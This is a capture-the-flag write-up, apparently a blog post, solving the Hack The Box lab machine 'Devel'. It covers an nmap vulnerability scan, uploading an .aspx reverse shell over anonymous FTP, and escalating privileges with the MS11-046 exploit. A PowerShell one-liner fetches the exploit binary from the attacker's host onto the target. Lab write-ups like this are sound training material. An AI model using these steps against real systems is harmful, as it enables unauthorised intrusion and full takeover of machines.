Devel

Welcome back, here we have a very old HacktheBox easy machine, that for this reason is really simple, but let’s start as usual, by running nmap

┌──(kali㉿kali)-[~/diego/Hack_the_box/Machines/Devel]
└─$ sudo nmap -sS -sC -sV --script=vuln -oN scans/nmap.txt 10.10.10.5
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-22 14:50 EDT
Nmap scan report for 10.10.10.5
Host is up (0.056s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| vulners: 
|   cpe:/a:microsoft:internet_information_services:7.5: 
|       CVE-2010-3972   10.0    https://vulners.com/cve/CVE-2010-3972
|       SSV:20122       9.3     https://vulners.com/seebug/SSV:20122    *EXPLOIT*
|       CVE-2010-2730   9.3     https://vulners.com/cve/CVE-2010-2730
|       SSV:20121       4.3     https://vulners.com/seebug/SSV:20121    *EXPLOIT*
|_      CVE-2010-1899   4.3     https://vulners.com/cve/CVE-2010-1899
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 253.22 seconds

As always we have a website that we can visit

This is the tipical page of Windows IIS, where we have nothing to do, but from nmap we can see that there is the ftp port, and maybe we can login via anonymous

And we are in! By listing the files we can see that there are all the pages that are visitable from the site, like the welcome.png one.

We can now try to upload custom files like a revshell in php or py.

As you can see neither of them seems not to be readable from the website page, so we can think of an executable extension allowed, and because we are in an aspnet_client, maybe we can use the .aspx extension.

It works so now we can upload an .aspx reverseshell found online. Now we just need to upload it and visit the page while listening at that port

Privilege Escalation

In this machine we won’t be able to read the user flag until we will get to admin, because we are not allowd to visit the user page, but by looking at the system informations we can get some interesting infos

As you can see we have a pretty old windows version without any Hot-Fix, and by looking for it online we found an interesting page

We have even the EDB-ID that we can use to fetch the exploit from searchsploit

Now we need to compile the code in the given way of the CVE

So just compile and trasfer it via python server

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.204:8000/MS11-046.exe', 'C:\Windows\Temp\MS11-046.exe')"

And here is the exploit execution

Now we are system and like this we can fetch all the flags

c:\>type \Users\babis\Desktop\user.txt
type \Users\babis\Desktop\user.txt
aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX6

c:\>type \Users\administrator\Desktop\root.txt
type \Users\administrator\Desktop\root.txt
6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX5

Just like this we solved the machine 0xCY@